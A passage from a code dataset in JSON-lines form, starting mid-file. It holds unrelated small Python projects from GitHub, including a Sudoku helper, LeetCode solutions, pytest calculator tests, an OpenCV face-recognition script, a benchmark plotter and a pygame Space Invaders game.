(HEIGHT / COLS * 0.15)))\n for numy, yrow in enumerate(footnote_board):\n for numx, x in enumerate(yrow):\n if len(x) == 0:\n pass\n elif len(x) > 0 and board[numy][numx] > 9:\n for co_num, num in enumerate(x):\n text = font_footnote.render(str(num), False, LIGHT_GRAY)\n window.blit(text, (numx * (WIDTH / ROWS) + (WIDTH / ROWS * 0.09) + (co_num % 3) * 25,\n numy * (HEIGHT / COLS) + (HEIGHT / COLS * 0.07) + ((co_num // 3) * 25)))\n\n\ndef drawgrid(window):\n for y in range(1, WIDTH // ROWS):\n if y % 3 == 0:\n width = 4\n else:\n width = 2\n rect = pg.rect.Rect((y * WIDTH // ROWS, 0), (width, HEIGHT))\n pg.draw.rect(window, BLACK, rect)\n for x in range(HEIGHT // COLS):\n if x % 3 == 0 and x != 0:\n width = 4\n else:\n width = 2\n rect = pg.rect.Rect((0, x * HEIGHT // COLS), (HEIGHT, width))\n pg.draw.rect(window, BLACK, rect)\n\n\ndef draw_mini_board(window, mini_board, cox, coy):\n for num in range(10):\n if num % 3 == 0:color = BLACK\n else: color = LIGHT_GRAY\n pg.draw.rect(window, color, (coy + 18 * num, cox, 1, 162))\n pg.draw.rect(window, color, (coy, cox + 18 * num, 162, 1))\n\n for numy, yrow in enumerate(mini_board):\n for numx, x in enumerate(yrow):\n if x == 10:\n pass\n else:\n text = font_mini_num.render(str(x), False, BLACK)\n window.blit(text, ((numx * 18 + coy + 5), (numy * 18 + cox + 4)))\n\n\ndef move_selected(cox, coy, seletected_num):\n for numy, yrow in enumerate(board):\n for numx, x in enumerate(yrow):\n if x == seletected_num:\n if 0 <= (numy + coy) < 9 and 0 <= (numx + cox) < 9 and 
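The box scan inside `used_nums` above relies on integer division to locate the 3x3 box that contains a cell. The same arithmetic as a standalone helper (hypothetical name, same `board` layout as the record):

```python
def box_values(board, cox, coy):
    # // 3 selects the box; offsets 0..2 enumerate its nine cells.
    by, bx = (coy // 3) * 3, (cox // 3) * 3
    return [board[by + dy][bx + dx] for dy in range(3) for dx in range(3)]
```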
board[numy + coy][numx + cox] == 10:\n board[numy][numx] = 10\n board[numy + coy][numx + cox] = seletected_num\n used_nums(numx + cox, numy + coy)\n print(av_nums)\n return None\n","repo_name":"JustJust03/Sudoku-Solver","sub_path":"Helper/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"32678919722","text":"#hello \n#today we are going to make KNN classification algo\n# in IRIS dataset\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np \nfrom sklearn.model_selection import train_test_split\n\niris_dataset = load_iris()\n\nX_train, X_test, Y_train, Y_test = train_test_split(iris_dataset[\"data\"],\niris_dataset[\"target\"],random_state=0)\n\nkn = KNeighborsClassifier(n_neighbors=1)\nkn.fit(X_train,Y_train)\n\nx_new = np.array([[5,2.7,1,0.8]])\n#prediction method now ->\n\nprediction = kn.predict(x_new)\n\nprint(\"Predict target Value -> {}\\n\".format(prediction))\nprint(\"Predict Feature Name -> {}\\n\".format(iris_dataset[\"target_names\"][prediction]))\nprint(\"Score -> {:.2f}\".format(kn.score(X_test,Y_test)))","repo_name":"dharmanshusoni/Python-ML","sub_path":"kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"7957531850","text":"from typing import List\n\n\nclass Solution:\n def calPoints(self, ops: List[str]) -> int:\n scores_stack = []\n\n operators = {\n '+': lambda stk: stk.append(stk[-2] + stk[-1]),\n 'D': lambda stk: stk.append(stk[-1] * 2),\n 'C': lambda stk: stk.pop(),\n }\n\n for element in ops:\n if element in operators:\n operators[element](scores_stack)\n continue\n scores_stack.append(int(element))\n return sum(scores_stack)\n","repo_name":"aBulgakoff/algos","sub_path":"leetcode/stack/682_baseball_game.py","file_name":"682_baseball_game.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
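A quick sanity check for the stack-based calPoints above, using LeetCode 682's first example (this snippet assumes the Solution class from that record; it is illustrative, not part of the repository):

# "5" -> [5]; "2" -> [5, 2]; "C" removes the 2 -> [5];
# "D" doubles the previous score -> [5, 10]; "+" appends 5 + 10 -> [5, 10, 15]
assert Solution().calPoints(["5", "2", "C", "D", "+"]) == 30  # 5 + 10 + 15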
 +{"seq_id":"1897107113","text":"# 1006. Clumsy Factorial\n# Normally, the factorial of a positive integer N is the product of all positive integers less than or equal to N. For example, factorial(10) = 10 * 9 * 8 * 7 * 6 * 5 * 4 * 3 * 2 * 1.\n# Instead, we design a clumsy factorial: using the integers in decreasing order, we replace the original multiply operations with a fixed rotation of operators: multiply (*), divide (/), add (+) and subtract (-).\n# For example, clumsy(10) = 10 * 9 / 8 + 7 - 6 * 5 / 4 + 3 - 2 * 1. However, these operations are still applied using the usual order of operations of arithmetic:\n# we do all multiplication and division steps before any addition or subtraction steps, and multiplication and division steps are processed left to right.\n# Additionally, the division that we use is floor division, so 10 * 9 / 8 equals 11. This guarantees the result is an integer.\n# Implement the clumsy function defined above: given an integer N, it returns the clumsy factorial of N.\ndef clumsy(N: int):\n operator = ['*', '/', '+', '-']\n operatorCounter = 0\n numStack = [N]\n numCounter = N - 1\n firstSet = True\n\n def operate(currentOperator):\n if currentOperator == '*':\n operateLatterNum = numStack.pop(-1)\n numStack.append(operateLatterNum * numStack.pop(-1))\n elif currentOperator == '/':\n operateLatterNum = numStack.pop(-1)\n numStack.append(int(numStack.pop(-1) / operateLatterNum))\n elif currentOperator == '+':\n if firstSet:\n operateLatterNum = numStack.pop(-1)\n numStack.append(numStack.pop(-1) + operateLatterNum)\n else:\n operateLatterNum = numStack.pop(-1)\n numStack.append(numStack.pop(-1) - operateLatterNum)\n else:\n operateLatterNum = numStack.pop(-1)\n numStack.append(numStack.pop(-1) - operateLatterNum)\n\n while numCounter > 0:\n currentOperator = operator[operatorCounter % 4]\n operatorCounter += 1\n numStack.append(numCounter)\n numCounter -= 1\n if currentOperator != '-':\n operate(currentOperator)\n else:\n firstSet = False\n for i in range(len(numStack)):\n if i != 0:\n numStack[i] = -numStack[i]\n return sum(numStack)\n\n\nclumsy(4)\n\n\ndef clumsyVersion2(N: int):\n firstSet = True\n setNumber = N >> 2\n remainder = N % 4\n finalSetIfFirstSet = [0, 1, 2 * 1, int(3 * 2 / 1)]\n finalSetIfNotFirstSet = [0, - 1, - 2 * 1, -int(3 * 2 / 1)]\n result = []\n for i in range(setNumber):\n if firstSet:\n firstSet = False\n result.append(int(N * (N - 1) / (N - 2)) + N - 3)\n else:\n result.append(-int(N * (N - 1) / (N - 2)) + N - 3)\n N -= 4\n if firstSet:\n result.append(finalSetIfFirstSet[remainder])\n else:\n result.append(finalSetIfNotFirstSet[remainder])\n return sum(result)\n\n\nclumsyVersion2(10)\n","repo_name":"Zombiesama18/Leetcode_Python","sub_path":"Leetcode/1006. 笨阶乘.py","file_name":"1006. 笨阶乘.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
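A worked check for the two implementations above (illustrative, assuming the functions defined in that record): since 10 * 9 // 8 = 11 and 6 * 5 // 4 = 7, clumsy(10) = 11 + 7 - 7 + 3 - 2 = 12.

assert clumsy(10) == 12
assert clumsyVersion2(10) == 12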
Circle\")\n choice = input(\"Enter your choice: \").strip()\n if choice == '1':\n a = float(input(\"Enter a: \"))\n b = float(input(\"Enter b: \"))\n print(f\"Area of rectangle: {rectangle_area(a, b):.2f}\")\n elif choice == '2':\n base = float(input(\"Enter base: \"))\n height = float(input(\"Enter height: \"))\n print(f\"Area of triangle: {triangle_area(base, height):.2f}\")\n elif choice == '3':\n radius = float(input(\"Enter radius: \"))\n print(f\"Area of circle: {circle_area(radius):.2f}\")\n else:\n print(\"Invalid choice\")\n \nif __name__ == \"__main__\":\n main()","repo_name":"kolyasalubov/Lv-UA-1020.PythonFundamentals","sub_path":"AndyDorokhin/HW8/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"20818480945","text":"import pytest\nimport yaml\n\nfrom python_code.calc import Calculator\n\nwith open(\"./datas/calc.yaml\", encoding='utf-8') as f:\n datas = yaml.safe_load(f)\n datas_add = datas['add']\n add_datas = datas_add['datas']\n print(add_datas)\n add_myid = datas_add['myid']\n print(add_myid)\n\n # datas = yaml.safe_load(f)\n datas_div = datas['div']\n div_datas = datas_div['datas']\n print(div_datas)\n div_myid = datas_div['myid']\n print(div_myid)\n\n\n# def test_a():\n# print(\"a\")\n\n\n# def func():\nclass TestCalc:\n def setup_class(self):\n print(\"开始计算\")\n # 实例化计算器类\n self.calc = Calculator()\n\n def teardown_class(self):\n print(\"计算结束\")\n\n @pytest.mark.parametrize(\n \"a, b, expect\",\n add_datas, ids=add_myid\n\n )\n def test_add(self, a, b, expect):\n # 实例化计算器的类\n # calc = Calculator()\n # 调用 add 方法\n result = self.calc.add(a, b)\n # 判断result 是浮点数,保留2位小数\n if isinstance(result, float):\n result = round(result, 2)\n # 断言\n assert result == expect\n\n @pytest.mark.parametrize(\n \"a, b, expect\",\n div_datas, ids=div_myid\n )\n def test_div(self, a, b, expect):\n result = self.calc.div(a, b)\n if isinstance(result, float):\n result = round(result, 2)\n\n assert result == expect\n\n # def test_add2(self):\n # result = self.calc.add(0.1, 0.2)\n # assert round(result, 2) == 0.3\n\n # def test_add1(self):\n # #实例化计算器的类\n # # calc = Calculator()\n # #调用 add 方法\n # result = self.calc.add(0.1, 0.1)\n # #断言\n # assert result == 0.2\n #\n # def test_add2(self):\n # #实例化计算器的类\n # # calc = Calculator()\n # #调用 add 方法\n # result = self.calc.add(-1, -1)\n # #断言\n # assert result == -2\n\n\n","repo_name":"cjz924813688/HogwartsFI03","sub_path":"testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33979809061","text":"from cv2 import cv2\nimport os,urllib.request\nimport numpy as np\nfrom django.conf import settings\nfrom django.http.response import StreamingHttpResponse\nfrom django.contrib import messages\n# import dlib\nimport sys\n\nsize = 4\nprint(\"WEart1\")\nhaar_file = 'static/haarcascade_frontalface_default.xml'\nprint(\"WEart4\")\ndatasets = 'static/datasets'\n\ncamera = cv2.VideoCapture(0)\n\ndef face_recognize():\n print('Recognizing Face Please Be in sufficient Lights...')\n # Create a list of images and a list of corresponding names\n (images, lables, names, id) = ([], [], {}, 0)\n for (subdirs, dirs, files) in os.walk(datasets):\n for subdir in dirs:\n names[id] = subdir\n subjectpath = os.path.join(datasets, subdir)\n for filename in os.listdir(subjectpath):\n path = subjectpath + 
 +{"seq_id":"33979809061","text":"from cv2 import cv2\nimport os,urllib.request\nimport numpy as np\nfrom django.conf import settings\nfrom django.http.response import StreamingHttpResponse\nfrom django.contrib import messages\n# import dlib\nimport sys\n\nsize = 4\nprint(\"WEart1\")\nhaar_file = 'static/haarcascade_frontalface_default.xml'\nprint(\"WEart4\")\ndatasets = 'static/datasets'\n\ncamera = cv2.VideoCapture(0)\n\ndef face_recognize():\n print('Recognizing Face Please Be in sufficient Lights...')\n # Create a list of images and a list of corresponding names\n (images, lables, names, id) = ([], [], {}, 0)\n for (subdirs, dirs, files) in os.walk(datasets):\n for subdir in dirs:\n names[id] = subdir\n subjectpath = os.path.join(datasets, subdir)\n for filename in os.listdir(subjectpath):\n path = subjectpath + '/' + filename\n lable = id\n images.append(cv2.imread(path, 0))\n lables.append(int(lable))\n id += 1\n (width, height) = (130, 100)\n # Create a Numpy array from the two lists above\n (images, lables) = [np.array(lis) for lis in [images, lables]]\n # OpenCV trains a model from the images\n # NOTE FOR OpenCV2: remove '.face'\n model = cv2.face.LBPHFaceRecognizer_create()\n model.train(images, lables)\n # Part 2: Use fisherRecognizer on camera stream\n face_cascade = cv2.CascadeClassifier(haar_file)\n \n while True:\n print(\"WEart\")\n success,frame=camera.read()\n print(\"WEart2\")\n if not success:\n print(\"WEart3\")\n break\n else:\n # Part 1: Create fisherRecognizer \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n face = gray[y:y + h, x:x + w]\n face_resize = cv2.resize(face, (width, height))\n # Try to recognize the face\n prediction = model.predict(face_resize)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n \n if prediction[1]<500:\n cv2.putText(frame, '% s - %.0f' %(names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0))\n else:\n # mark the unrecognized face with a valid putText call\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n cv2.putText(frame, 'not recognized', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.imshow('OpenCV', frame)\n key = cv2.waitKey(10)\n if key == 27:\n break\n\n\n\n","repo_name":"Pritam-Sh/WebApp","sub_path":"felony/nextcamera.py","file_name":"nextcamera.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32791983070","text":"from ...util import central_data_store\nfrom ...util import settings\nfrom ...util import number_output\nfrom . import storage\n\n# External\nimport datetime\nimport numpy as np\n\n\n# 1. 
Global vars ===============================================================\n\n\n# 1.1 Classes ------------------------------------------------------------------\nclass BaseStorage(object): # class to be extended for each node\n\n def __init__(self):\n self.__storages = []\n self.__log_storages = None\n self.__sw_storages = None # string de-duplicator for storage overview output\n self.__array_storages = []\n\n\n def load_storages(self, storages):\n for item in storages:\n obj = storage.Storage.loadFromFileData(item)\n self.add_storage(obj)\n\n\n def add_storage(self, storage):\n self.__storages.append(storage)\n\n\n def register_storages(self, prefix,\n cds: central_data_store.CentralDataStore,\n cfg: settings.Config):\n \"\"\"\n Registers all the storages with the data tree & sets up local output.\n\n prefix - prefix of the output filename & -path for logging storage data\n \"\"\"\n\n # register\n for store in self.__storages:\n store.register(self)\n\n # output\n self.__log_storages = cfg.get_log_storages\n if (len(self.__storages) > 0 and self.__log_storages()):\n header = []\n self.__array_storages = [None] * len(self.__storages)\n for store in self.__storages:\n header.append(store.get_node_name())\n self.__sw_storages = number_output.NumberOutput(\n prefix + '_storages.csv', len(self.__storages), header,\n cfg.log_storages, cds.get_single_file_storages(),\n self.get_full_node_id())\n\n\n def update_storage_values(self, current_tp: datetime.datetime):\n for store in self.__storages:\n store.update(current_tp)\n\n\n def log_storages(self, current_time: datetime.datetime,\n last_time: datetime.datetime):\n if (len(self.__storages) > 0 and self.__log_storages()):\n\n for i, store in enumerate(self.__storages):\n self.__array_storages[i] = store.get_volume()\n\n self.__sw_storages.write_record(np.array(self.__array_storages),\n current_time, last_time)\n\n\n def close_storages(self, current_time: datetime.datetime):\n if (len(self.__storages) > 0 and self.__log_storages()):\n self.__sw_storages.close(current_time)\n\n\n def error_storage_no_node(self, str_class: str, parts: list):\n print(f'\\nError: {str_class}._get_child_object:')\n print(f'{str_class} object with {parts[0]} does not exist')\n print(f'Search ID: {\".\".join(str(x) for x in parts)}')\n self.print_node_id_list_storage()\n exit(255)\n\n\n def print_node_id_list_storage(self):\n print('\\nAttached storages:')\n for store in self.__storages:\n print(f' {store.get_node_id()}')\n\n\n def _get_ided_storage_object(self, obj_id):\n for store in self.__storages:\n if (store.get_node_id() == obj_id):\n return store\n\n return None\n\n\n def output_overview_storages(self, f, level: int = -1):\n \"\"\"\n Outputs the number of elements within the model\n \"\"\"\n\n if (level < 0):\n print(f'{self.get_node_name()}.output_overview_storages: Level not set')\n exit(255)\n\n f.write(\"\\n\" + \" \" * level + f\"Num Storages: {len(self.__storages)}\")\n\n\n\n\n\n\n\n# 2. Functions =================================================================\n\n\n# 3. 
Main Exec =================================================================\n","repo_name":"nclwater/HUUM_model","sub_path":"src/huum_model/translators/storage/base_storage.py","file_name":"base_storage.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11229763436","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport csv\nfrom datetime import datetime\n\n\ndef parse_csv(path):\n \"\"\"Read in the way that dict[algorithm][world_size] --> list\"\"\"\n results = dict()\n with open(path) as csvfile:\n iterator = csv.reader(csvfile, delimiter=',')\n for row in iterator:\n print(row)\n algorithm, world_size, object_size, mean, std = row[0].split('_')[-1], int(row[1]), int(row[2]), float(row[3]), float(row[4])\n if algorithm not in results:\n results[algorithm] = {}\n if world_size not in results[algorithm]:\n results[algorithm][world_size] = []\n results[algorithm][world_size].append([object_size, mean, std])\n return results\n\ndef read_data(setting, backend):\n if setting == 'multigpu':\n assert backend == 'gpu'\n ray_path = 'multigpu/ray-microbenchmark-gpu.csv'\n pytorch_path = 'multigpu/pytorch-microbenchmark-nccl.csv'\n else:\n if backend == 'cpu':\n ray_path = 'distributed/ray-microbenchmark-cpu.csv'\n pytorch_path = 'distributed/pytorch-microbenchmark-gloo.csv'\n else:\n ray_path = 'distributed/ray-microbenchmark-gpu.csv'\n pytorch_path = 'distributed/pytorch-microbenchmark-nccl.csv'\n ray_data = parse_csv(ray_path)\n pytorch_data = parse_csv(pytorch_path)\n return ray_data, pytorch_data\n\n\n\n\ndef draw(ray, other, fig_name):\n fig, ax = plt.subplots(figsize=(4.5, 2.5))\n width = 0.1 # the width of the bars\n margin = width * 3 + 0.1\n start = 0.1\n ind = np.array([start + m * margin for m in range(ray.shape[0])])\n\n labelfont = {\n 'color': 'black',\n 'weight': 'normal',\n 'size': 12}\n\n colors = ['darkorange', 'c', 'lightgreen', 'lightskyblue']\n hatches = ['/', '\\\\', '+', 'x', '+',]\n rects = []\n\n data = np.stack((ray[:,1], other[:,1]))\n for i in range(2):\n m = ax.bar(ind + width * i, np.log10(data[i] * 1e6), width, color=colors[i], edgecolor='black', hatch=hatches[i])\n rects.append(m)\n\n # ax.set_xlim(xmin=0.0, xmax=2)\n xs = ind + width / 2\n ax.set_xticks(xs)\n ax.set_xticklabels(('1KB', '32KB', '1MB', '32MB', '1GB'), fontdict = labelfont)\n ax.set_ylabel('Latency (micro sec)', fontdict = labelfont)\n ax.set_ylim(ymax=7, ymin=1)\n ax.set_yticks([1, 2, 3, 4, 5, 6])\n ax.set_yticklabels(['$10^1$', '$10^2$', '$10^3$', '$10^4$', '$10^5$', '$10^6$'])\n if 'cpu' in fig_name:\n other_name = 'gloo'\n else:\n other_name = 'nccl'\n ax.legend((rects[0][0], rects[1][0]), ('ray', other_name), loc='upper left', ncol=1, prop={'size':12})\n # set the grid lines to dotted\n ax.grid(True)\n gridlines = ax.get_ygridlines() + ax.get_xgridlines()\n for line in gridlines:\n line.set_linestyle('-.')\n\n # # add the imporvement\n # improvement1 = round(min(data[0][0], data[1][0]) / data[2][0], 2)\n # ax.text(0.26, data[2][0] + 0.005, str(improvement1) + 'x', size=10, weight='bold')\n #\n # # improvement1 = round(max(data[0][0], data[1][0]) / data[3][0], 2)\n # ax.text(0.36, data[3][0] + 0.005, '1.2x', size=10, weight='bold')\n #\n # improvement2 = round(min(data[0][1], data[1][1]) / data[2][1], 2)\n # ax.text(0.76, data[2][1] + 0.005, str(improvement2) + 'x', size=10, weight='bold')\n #\n # improvement2 = round(min(data[0][1], data[1][1]) / data[3][1], 2)\n # 
ax.text(0.86, data[3][1] + 0.005, str(improvement2) + 'x', size=10, weight='bold')\n #\n # # one bar is out ot range\n # ax.text(0.65, 0.38, str(round(data[1][1], 2)), size=10)\n\n\n ax.set_title(fig_name, fontsize=12, weight='bold')\n plt.show()\n #ax.text(rects12[0].get_x()+rects12[0].get_width()/2, rects12[0].get_y()+rects12[0].get_height() + 0.2, 'TF', ha='center', va='bottom', fontsize=9)\n #ax.text(rects12[1].get_x()+rects12[1].get_width()/2, rects12[1].get_y()+rects12[1].get_height() + 0.2, 'TF-P-wf', ha='center', va='bottom', fontsize=9)\n #ax.text(rects12[2].get_x()+rects12[2].get_width()/2, rects12[2].get_y()+rects12[2].get_height() + 0.2, 'TF-P', ha='center', va='bottom', fontsize=9)\n\n #ax.text(rects22[0].get_x()+rects22[0].get_width()/2, rects22[0].get_y()+rects22[0].get_height() + 0.2, 'TF', ha='center', va='bottom', fontsize=9)\n #ax.text(rects22[1].get_x()+rects22[1].get_width()/2, rects22[1].get_y()+rects22[1].get_height() + 0.2, 'TF-P-wf', ha='center', va='bottom', fontsize=9)\n #ax.text(rects22[2].get_x()+rects22[2].get_width()/2, rects22[2].get_y()+rects22[2].get_height() + 0.2, 'TF-P', ha='center', va='bottom', fontsize=9)\n\n #ax.text(rects32[0].get_x()+rects32[0].get_width()/2, rects32[0].get_y()+rects32[0].get_height() + 0.2, 'TF', ha='center', va='bottom', fontsize=9)\n #ax.text(rects32[1].get_x()+rects32[1].get_width()/2, rects32[1].get_y()+rects32[1].get_height() + 0.2, 'TF-P-wf', ha='center', va='bottom', fontsize=9)\n #ax.text(rects32[2].get_x()+rects32[2].get_width()/2, rects32[2].get_y()+rects32[2].get_height() + 0.2, 'TF-P', ha='center', va='bottom', fontsize=9)\n\n #def autolabel(rectss):\n # attach some text labels\n # n = len(rectss)\n # for j in range(len(rectss[0])):\n # height = 0\n # for i in range(n):\n # height = height + rectss[i][j].get_height()\n # ax.text(rectss[0][j].get_x()+rectss[0][j].get_width()/2, height + 0.6, '%0.0f'% height,\n # ha='center', va='bottom', fontsize=8)\n\n # autolabel([rects1, rects12, rects3])\n # autolabel([rects12, rects122, rects32])\n\n plt.tight_layout()\n # plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\n\n #plt.show()\n save_dir = os.path.join('plots/', fig_name)\n # fig.savefig(save_dir + '.pdf', transparent = True, bbox_inches = 'tight', pad_inches = 0)\n fig.savefig(save_dir + '.png', transparent = True, bbox_inches = 'tight', pad_inches = 0)\n\n\nbackends = ['cpu', 'gpu']\nsettings = ['multigpu', 'distributed']\nfor setting in settings:\n for backend in backends:\n if setting == 'multigpu' and backend == 'cpu':\n continue\n\n ray_data, pytorch_data = read_data(setting, backend)\n\n if backend == 'gpu':\n algorithms = ['reduce', 'broadcast', 'allgather', 'allreduce']\n else:\n algorithms = ['reduce', 'gather', 'broadcast', 'allgather', 'allreduce', 'sendrecv']\n if setting == 'multigpu':\n world_sizes = [2]\n else:\n world_sizes = [2, 4, 8, 16]\n\n for algorithm in algorithms:\n for world_size in world_sizes:\n fig_name = '{}-{}-{}-{}'.format(setting, backend, algorithm, world_size)\n draw(np.array(ray_data[algorithm][world_size]), np.array(pytorch_data[algorithm][world_size]), fig_name)\n\n","repo_name":"zhisbug/ray-scalable-ml-design","sub_path":"pytorch/microbenchmark/primitives/results/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"31612393772","text":"import pygame\r\nimport random\r\nimport math\r\nfrom pygame import mixer\r\npygame.init()\r\n# create the 
screen\r\nscreen = pygame.display.set_mode((800, 600))\r\n\r\n# title and logo\r\npygame.display.set_caption('SPACE INVADER')\r\n# logo=pygame.image.load('cbse.png')\r\n# pygame.display.set_icon(logo)\r\n\r\n# player name\r\n#name= input(\"what is ur name\")\r\nname = \"RAGHVENDRA\"\r\nname = name.upper()\r\nfont1 = pygame.font.Font('freesansbold.ttf', 52)\r\n\r\n# player\r\nplayerimg = pygame.image.load('spaceship.png')\r\nplayerX = 380\r\nplayerX_change = 0\r\nplayerY = 510\r\npygame.display.update()\r\n\r\n\r\n# enemy\r\nenemyimg = []\r\nenemyX_change = []\r\nenemyY_change = []\r\nenemyX = []\r\n\r\nenemyY = []\r\nnum_of_enemies = 7\r\n\r\nfor i in range(num_of_enemies):\r\n enemyimg.append(pygame.image.load(\"monster.png\"))\r\n enemyX_change.append(7)\r\n enemyY_change.append(40)\r\n enemyX.append(random.randint(0, 730))\r\n enemyY.append(random.randint(0, 50))\r\n pygame.display.update()\r\n\r\n# bullet\r\nbulletimg = pygame.image.load(\"bullet1.png\")\r\nbulletX = 0\r\nbulletX_change = 0\r\nbulletY_change = 40\r\nbulletY = 400\r\nbullet_state = \"ready\" # ready- you can't see bullet on screen #fire- bullet moving\r\n\r\n# score\r\nscore_value = 0\r\nfont = pygame.font.Font('freesansbold.ttf', 32)\r\ntextX = 42\r\ntextY = 16\r\n\r\n# game over text\r\n\r\nover_font = pygame.font.Font('freesansbold.ttf', 76)\r\nhigh_font = pygame.font.Font('freesansbold.ttf', 46)\r\n\r\n\r\n# background\r\nbackground = pygame.image.load(\"space.png\")\r\nbck = pygame.image.load(\"start.png\")\r\n# walls\r\nwall = pygame.image.load('bricks.png')\r\n\r\n# background sound\r\nmixer.music.load('background.wav')\r\nmixer.music.play(-1)\r\n\r\n\r\ndef show_name(x, y):\r\n nam_e = font1.render(\"HELLO \" + name.upper(), True, (225, 0, 0))\r\n screen.blit(nam_e, (x, y))\r\n\r\n\r\ndef show_score(x, y):\r\n score = font.render(\"Score :\" + str(score_value), True, (0, 255, 0))\r\n screen.blit(score, (x, y))\r\n\r\n\r\ndef game_over_text():\r\n over_text = over_font.render(\"Game Over \", True, (0, 255, 0))\r\n screen.blit(over_text, (220, 220))\r\n\r\n\r\ndef high_score():\r\n high_text = high_font.render(\r\n \"Your Highscore : \" + str(score_value), True, (0, 255, 0))\r\n screen.blit(high_text, (220, 310))\r\n\r\n\r\ndef player(x, y):\r\n screen.blit(playerimg, (x, y)) # blit means draw\r\n\r\n\r\ndef enemy(x, y, i):\r\n screen.blit(enemyimg[i], (x, y))\r\n\r\n\r\ndef fire_bullet(x, y):\r\n global bullet_state\r\n bullet_state = \"fire\"\r\n screen.blit(bulletimg, (x + 15, y+17))\r\n\r\n\r\ndef isCollision(enemyX, enemyY, bulletX, bulletY):\r\n distance = math.sqrt((math.pow(enemyX - bulletX, 2)) +\r\n (math.pow(enemyY - bulletY, 2)))\r\n if distance <= 30:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n# game loop\r\nmenu = True\r\nrunning = True\r\nwhile running:\r\n while menu:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n menu = False\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n\r\n screen.fill((0, 0, 0))\r\n screen.blit(bck, (-260, 80))\r\n show_name(174, 150)\r\n pygame.display.update()\r\n\r\n # background\r\n screen.fill((0, 0, 250))\r\n screen.blit(background, (0, 0))\r\n screen.blit(wall, (0, 450))\r\n\r\n # knowing keys\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n playerX_change = -15\r\n if event.key == pygame.K_RIGHT:\r\n playerX_change = 15\r\n if event.key == pygame.K_p:\r\n menu = True\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n if event.key == pygame.K_SPACE:\r\n if bullet_state == \"ready\":\r\n # bullet sound\r\n bullet_sound = mixer.Sound('laser.mp3')\r\n bullet_sound.play()\r\n bulletX = playerX\r\n fire_bullet(playerX, bulletY)\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n playerX_change = 0 # if it is not 0 then player remain moving\r\n\r\n# player movement\r\n playerX += playerX_change\r\n if playerX <= 0:\r\n playerX = 0\r\n elif playerX >= 750:\r\n playerX = 750\r\n\r\n# enemy movement\r\n for i in range(num_of_enemies):\r\n enemyX[i] += enemyX_change[i]\r\n if enemyX[i] <= 0:\r\n enemyX_change[i] = 5\r\n enemyY[i] += enemyY_change[i]\r\n elif enemyX[i] >= 700:\r\n enemyX_change[i] = -5\r\n enemyY[i] += enemyY_change[i]\r\n # game over\r\n if enemyY[i] > 390:\r\n for j in range(num_of_enemies):\r\n enemyY[j] = 2000\r\n game_over_text()\r\n high_score()\r\n\r\n continue\r\n pygame.display.update()\r\n\r\n\r\n# collision\r\n collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)\r\n if collision:\r\n bomb_sound = mixer.Sound('bomb.mp3')\r\n bomb_sound.play()\r\n bulletY = 510\r\n bullet_state = \"ready\"\r\n score_value += 1\r\n enemyX[i] = random.randint(0, 730)\r\n enemyY[i] = random.randint(0, 50)\r\n\r\n enemy(enemyX[i], enemyY[i], i)\r\n # bullet movement\r\n if bulletY <= 0:\r\n bulletY = 510\r\n bullet_state = \"ready\"\r\n if bullet_state == \"fire\":\r\n fire_bullet(bulletX, bulletY)\r\n bulletY -= bulletY_change\r\n\r\n player(playerX, playerY)\r\n show_score(textX, textY)\r\n pygame.display.update()\r\n","repo_name":"Raghvendra-user/Space-Invaders","sub_path":"Space Invaders.py","file_name":"Space Invaders.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29140665753","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 12 23:53:23 2022\r\n\r\n@author: 